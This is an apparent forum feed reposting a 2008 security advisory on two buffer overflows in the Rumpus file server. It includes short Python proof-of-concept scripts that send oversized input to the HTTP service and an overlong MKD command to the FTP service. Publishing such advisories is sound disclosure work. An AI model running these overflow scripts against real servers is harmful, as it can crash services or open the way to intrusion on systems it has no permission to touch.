<![CDATA[Latest posts for the topic "Two buffer overflow vulnerabilities in Rumpus"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Two buffer overflow vulnerabilities in Rumpus http://www.maxum.com/Rumpus/News601.html. :Public disclosure: December 01, 2008 :Exploit code: For the vulnerability in HTTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 80 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send('z' * 2908 + '\n\n') s.recv(1024) s.close() For the vulnerability in FTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 21 user = "regular" pass_ = "training" commands = [ 'user regular\n', 'pass training\n', 'mkd ' + 'z' * 1046 + 'abcd\n' ] s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.recv(1024) for line in commands: s.send(line) s.recv(1024) s.close() Disclaimer ---------- The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. ]]> /hvaonline/posts/list/26506.html#161058 /hvaonline/posts/list/26506.html#161058 GMT Re: Two buffer overflow vulnerabilities in Rumpus /hvaonline/posts/list/26506.html#161261 /hvaonline/posts/list/26506.html#161261 GMT